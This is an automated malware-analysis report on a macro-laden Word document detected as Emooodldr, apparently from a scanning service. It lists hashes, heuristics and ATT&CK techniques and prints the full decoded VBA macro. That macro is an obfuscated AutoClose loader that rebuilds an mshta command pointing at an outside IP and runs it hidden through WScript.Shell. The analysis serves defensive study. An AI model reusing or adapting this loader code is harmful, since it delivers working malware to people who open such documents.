Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 e9c24d0a80b62274…

MALICIOUS

Office (OOXML)

54.3 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-10-30
MD5: 82d5bc54464e1d903cb806b9cc66faa7 SHA-1: f7a48cdfc7dccc4db70fc2d96058020ade558264 SHA-256: e9c24d0a80b622749a1b30f9d384a7cdd844310dbd3054898ec322cfabb65280
322 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Office document containing obfuscated VBA macros, specifically an Auto_Close macro that uses CreateObject to execute a payload. The script attempts to download a second-stage payload from the reconstructed URL 'http://198.55.107.156/owMzDPoxbFFLKwMzDPoxbFFLK/cQPvNpHcnBfoIxOuoUCgMqEPENrARMrjKvHFwMzDPoxbFFLK.php?uIxOuoUCgMqEPwMzDPoxbFFLKHkTMSRgCqrFk=hondHkTMSRgCqrFk' using 'WScript.Shell'. ClamAV detection further confirms its malicious nature, identifying it as Emooodldr.

Heuristics 7

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2537 bytes
SHA-256: bd3a392e520add1fdcd85c5a018bf6c69561fc804b7790ff6b84fff0e82560f9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub gamo()
 AcbTvAZ = "y" & Trim("H")
jqciixrGLNHf = "w" & "O" & Trim("A")
iyyRvyqT = 600 - 311 - 1134 - 249 - 1523 - 1012
YBJLZMXLTq = 1497 - 1854 - 860 - 1348 - 1094 - 307 - 1137

 rigoroso = "wMzDPoxbFFLKcQPvNpHcnBfohIxOuoUCgMqEPHkTMSRgCqrFk hIxOuoUCgMqEPIxOuoUCgMqEPp://198.55.107.156/owMzDPoxbFFLKwMzDPoxbFFLK/cQPvNpHcnBfoIxOuoUCgMqEPENrARMrjKvHFwMzDPoxbFFLK.php?uIxOuoUCgMqEPwMzDPoxbFFLKHkTMSRgCqrFk=hondHkTMSRgCqrFk"
rigoroso = Replace(rigoroso, "wMzDPoxbFFLK", "m")
BkdQwzwrr = 1389 - 1036 - 694 - 980
XwyAcQKGogyN = "d" & Trim("x") & "d"
wIXwHjKDfG = Trim("N") & Trim("C") & Trim("r") & "O"
rigoroso = Replace(rigoroso, "HkTMSRgCqrFk", "a")
bcDVLMFYL = 511 + 941 + 534 + 1751
rigoroso = Replace(rigoroso, "cQPvNpHcnBfo", "s")
rigoroso = Replace(rigoroso, "IxOuoUCgMqEP", "t")
HFOZxxJji = Trim("p") & Trim("c") & "L"
rigoroso = Replace(rigoroso, "ENrARMrjKvHF", "e")
rigoroso = Replace(rigoroso, "vUMvqygPMoRw", "l")

diluvio = "WScripRKKXIEWUfzFf.ShjIHGFrOKoigqZbIHqouHfgHzZbIHqouHfgHz"
diluvio = Replace(diluvio, "ovzxCUZxrrvP", "m")
JyXLfATD = 17 - 119 - 560 - 83
diluvio = Replace(diluvio, "LvYdjIggqKpq", "a")
ioHcydFoWDZ = "w" & "C"
cpfKYgT = 1079 + 1332 + 565 + 144 + 1624
GdviWPpq = 193 + 353
diluvio = Replace(diluvio, "DkiExzciANqM", "s")
VckTnLQD = 485 - 100 - 573 - 678 - 1625
wyWfyEHvJZJ = 747 + 469 + 1920 + 468
diluvio = Replace(diluvio, "RKKXIEWUfzFf", "t")
wfLfwDMCw = 1606 + 577 + 675 + 706 + 1162 + 1723 + 755
VbBMbuWjo = Trim("j") & Trim("n")
AYkHLgCXXHcn = 386 + 641 + 380 + 1375
diluvio = Replace(diluvio, "jIHGFrOKoigq", "e")
xoXbFqXZidcY = 1578 - 1579 - 1356 - 1152 - 396 - 1206
xFyovDN = 1851 - 1751 - 165
diluvio = Replace(diluvio, "ZbIHqouHfgHz", "l")


 CreateObject(diluvio).Run rigoroso, 0
 IwObLRbc = 615 - 936 - 1648 - 772 - 770 - 41
MXxVZOk = "I" & "x" & "X"
oLYRVQABRLT = 1664 + 190 + 832 + 1176 + 1746
VvcCoxzTIzBS = "g" & "P" & "n"

End Sub

Sub AutoClose()

  PXSwQpkgvyq = "N" & Trim("F") & "b"
DMgpFHV = Trim("T") & "f"

  Application.Run "gamo"
  KVycJGNTM = Trim("W") & "v" & Trim("M")
xHRrdRBJ = 1120 + 1750 + 864 + 234 + 73
YPuHyKjbZ = 1546 + 1346 + 1000
UFjLEGM = 1057 + 236 + 1977 + 177 + 174
jgAwxSBcfzp = "Q" & Trim("N")

End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 12800 bytes
SHA-256: 9ced9a25c9666be09cd600213f4dc05cc2fb9a502c343472cb4bf92edeb712e0
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: unlikely